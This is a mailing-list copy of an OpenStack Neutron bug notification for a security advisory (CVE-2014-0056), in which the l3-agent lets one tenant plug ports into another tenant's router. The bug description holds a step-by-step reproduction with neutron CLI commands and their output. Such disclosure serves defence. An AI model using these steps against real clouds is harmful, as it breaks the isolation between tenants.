← Back to team overview

yahoo-eng-team team mailing list archive

[Bug 1243327] Re: [OSSA 2014-008] Routers can be cross plugged by other tenants (CVE-2014-0056)

 

** No longer affects: neutron/grizzly

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1243327

Title:
  [OSSA 2014-008] Routers can be cross plugged by other tenants
  (CVE-2014-0056)

Status in OpenStack Neutron (virtual network service):
  Fix Released
Status in neutron havana series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released

Bug description:
  The l3-agent does not check tenant_id and allows for tenants to be
  able to plug ports into other's routers if the device_id is set to
  another tenants router.

  
  # become admin tenant
  arosen@arosen-desktop:~/devstack$ source openrc admin admin

  # Create router as admin: 
  arosen@arosen-desktop:~/devstack$ neutron  router-create admin-router
  Created a new router:
  +-----------------------+--------------------------------------+
  | Field                 | Value                                |
  +-----------------------+--------------------------------------+
  | admin_state_up        | True                                 |
  | external_gateway_info |                                      |
  | id                    | 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 |
  | name                  | admin-router                         |
  | status                | ACTIVE                               |
  | tenant_id             | 04e94acfe69f4960a69c6a78d39466c4     |
  +-----------------------+--------------------------------------+

  # Become demo tenant
  arosen@arosen-desktop:~/devstack$ source openrc demo demo 

  #create port with correct device_id and device_owner

  
  arosen@arosen-desktop:~/devstack$ neutron port-create private --device-id 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 --device-owner network:router_interface
  Created a new port:
  +-----------------------+---------------------------------------------------------------------------------+
  | Field                 | Value                                                                           |
  +-----------------------+---------------------------------------------------------------------------------+
  | admin_state_up        | True                                                                            |
  | allowed_address_pairs |                                                                                 |
  | device_id             | 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600                                            |
  | device_owner          | network:router_interface                                                        |
  | fixed_ips             | {"subnet_id": "5786a0a6-24c8-4156-b981-cc817011c6a7", "ip_address": "10.0.0.3"} |
  | id                    | 895cf428-4bfb-4c79-86c2-d40af9bf3587                                            |
  | mac_address           | fa:16:3e:21:33:6c                                                               |
  | name                  |                                                                                 |
  | network_id            | 4de8b4f6-ac11-4836-aefb-7ed4f49ab9a7                                            |
  | security_groups       |                                                                                 |
  | status                | DOWN                                                                            |
  | tenant_id             | ad069ea620614cce9c4b6f088d39d03e                                                |
  +-----------------------+---------------------------------------------------------------------------------+

  Now when the l3-agent is restarted or enters its periodic sync state:

  arosen@arosen-desktop:~/devstack$ sudo ip netns exec  qrouter-80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 ifconfig 
  lo        Link encap:Local Loopback  
            inet addr:127.0.0.1  Mask:255.0.0.0
            inet6 addr: ::1/128 Scope:Host
            UP LOOPBACK RUNNING  MTU:16436  Metric:1
            RX packets:0 errors:0 dropped:0 overruns:0 frame:0
            TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
            collisions:0 txqueuelen:0 
            RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

  qr-895cf428-4b Link encap:Ethernet  HWaddr fa:16:3e:21:33:6c  
            inet addr:10.0.0.3  Bcast:10.0.0.255  Mask:255.255.255.0
            inet6 addr: fe80::f816:3eff:fe21:336c/64 Scope:Link
            UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
            RX packets:4 errors:0 dropped:0 overruns:0 frame:0
            TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
            collisions:0 txqueuelen:0 
            RX bytes:300 (300.0 B)  TX bytes:398 (398.0 B)

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1243327/+subscriptions